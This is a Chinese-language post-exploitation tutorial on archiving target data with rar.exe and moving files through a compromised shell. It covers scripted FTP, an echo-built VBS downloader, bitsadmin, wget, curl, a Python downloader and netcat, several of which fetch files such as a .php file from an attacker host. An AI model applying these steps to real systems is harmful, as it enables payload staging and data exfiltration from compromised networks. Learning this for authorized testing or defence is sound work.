内网渗透之——数据压缩、传输

数据压缩

作用：

将文件打包，方便下载

Linux

直接使用tar命令压缩

windows

利用Rar.exe(winrar.exe里的执行文件)

参数说明:

a 添加文件到压缩文件中
-k 锁定压缩文件
-s产生固体存档,这样可以增大压缩比
-r包括子目录
-m 设置压缩比
        -m0 存储 添加到压缩文件时不压缩文件。
        -m1 最快 使用最快方式(低压缩)
        -m2 较快 使用快速压缩方式
        -m3 标准 使用标准(默认)压缩方式
        -m4 较好 使用较好压缩方式(较好压缩，但是慢)
        -m5 最好 使用最大压缩方式(最好的压缩，但是最慢)

常用压缩命令
把C:\inetpub\wwwroot目录下的所有东西打包为1.rar放到C:\inetpub\wwwroot目录下

rar.exe a -r -m1 C:\inetpub\wwwroot\1.rar C:\inetpub\wwwroot

数据传输

作用：

如果我们只拿到了一个命令行shell ，是无法直接传输文件的

Windwos

ftp上传下载

交互式命令行

1.输入ftp进入命令行使用ftp模式

2.输入?可查看命令

3.输入命令登陆ftp，之后输入账号密码

open 192.168.0.106(ftp地址)
ftp 192.168.0.106(ftp地址)

4.查看FTP服务器上的文件
dir：显示服务器目录和文件列表
ls：显示服务器简易的文件列表
cd：进入服务器指定的目录

5.上传下载文件
上传和下载文件时应该使用正确的传输类型，FTP的传输类型分为ASCII码方式和二进制方式两种，对.txt、.htm等文件应采用ASCII码方式传输，对.exe或图片、视频、音频等文件应采用二进制方式传输。在默认情况下，FTP为ASCII码传输方式

设置传输方式
type：查看当前的传输方式
ascii：设定传输方式为ASCII码方式
binary：设定传输方式为二进制方式
以上命令都不带参数

下载文件：
下载指定文件：filename为下载的FTP服务器上的文件名，newname为保存在本地计算机上时使用的名字，如果不指定newname，文件将以原名保存，get命令下载的文件将保存在本地计算机的工作目录下(当前目录)

get filename newname

上传文件：
上传指定文件：

filename为上传的本地文件名，newname为上传至FTP服务器上时使用的名字，如果不指定newname，文件将以原名上传

put filename newname
send filename newname

6.结束并退出FTP
close：结束与服务器的FTP会话
quit或者bye：结束与服务器的FTP会话并退出FTP环境

7. 其它FTP命令
pwd：查看FTP服务器上的当前工作目录
rename filename newfilename：重命名FTP服务器上的文件
deletefilename：删除FTP服务器上的文件

非交互式命令行

原理：命令行直接输入ftp -s:文件名，就会将文件里写好的ftp命令执行

1.利用重定向依次将ftp命令写入txt文件

echo open 192.168.0.106>> ftp.txt
echo lp>> ftp.txt
echo 123456>> ftp.txt
echo get 1.txt xxx.txt>> ftp.txt
echo bye>> ftp.txt

2.输入以下命令，ftp.txt文件里的命令就会执行

ftp -s:ftp.txt

vbs脚本下载

vbs脚本内容：修改http://192.168.0.106/1.php处为下载的文件，C:\Users\Administrator\1.php处为下载到哪

Set xPost=createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://192.168.0.106/1.php",0
xPost.Send()
set sGet=createObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write(xPost.ResponseBody)
sGet.SaveToFile "C:\Users\Administrator\1.php",2

交互式shell

直接输入cscript 1.vbs即可执行

             

非交互式命令行

1.利用重定向依次将vbs脚本内容写入vbs文件

echo Set xPost=createObject("Microsoft.XMLHTTP")>> 2.vbs
echo xPost.Open "GET","http://192.168.0.106/1.php",0 >> 2.vbs
echo xPost.Send()>> 2.vbs
echo set sGet=createObject("ADODB.Stream")>> 2.vbs
echo sGet.Mode=3 >> 2.vbs
echo sGet.Type=1 >> 2.vbs
echo sGet.Open()>> 2.vbs
echo sGet.Write(xPost.ResponseBody)>> 2.vbs
echo sGet.SaveToFile "C:\Users\Administrator\lpxr.php",2 >> 2.vbs

2.输入cscript 2.vbs执行

       

bitsadmin下载

Windows2008 可用

命令： 

bitsadmin /transfer n http://192.168.0.106/1.zip c:\12.zip

http://192.168.0.106/1.zip：从哪里下载     c:\12.zip：下载到哪

           

Linux

wget文件下载

命令

wget http://192.168.0.106/1.zip -P /root/1.zip

http://192.168.0.106/1.zip：下载路径     -P /root/1.zip：指定下载到哪

curl文件下载

命令

curl http://192.168.0.106/1.zip --output aa.zip

http://192.168.0.106/1.zip：下载路径     --output aa.zip：指定下载到哪

python文件下载

脚本内容

#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://192.168.0.106/1.zip')
localFile = open('/root/1.zip', 'w')
localFile.write(u.read())
localFile.close()

http://192.168.0.106/1.zip替换下载地址     /root/1.zip处写下载到哪
之后执行

nc文件传输

服务端输入:

cat filename | nc -lvvp 1234

下载端输入:

nc 下载地址ip 1234 > filename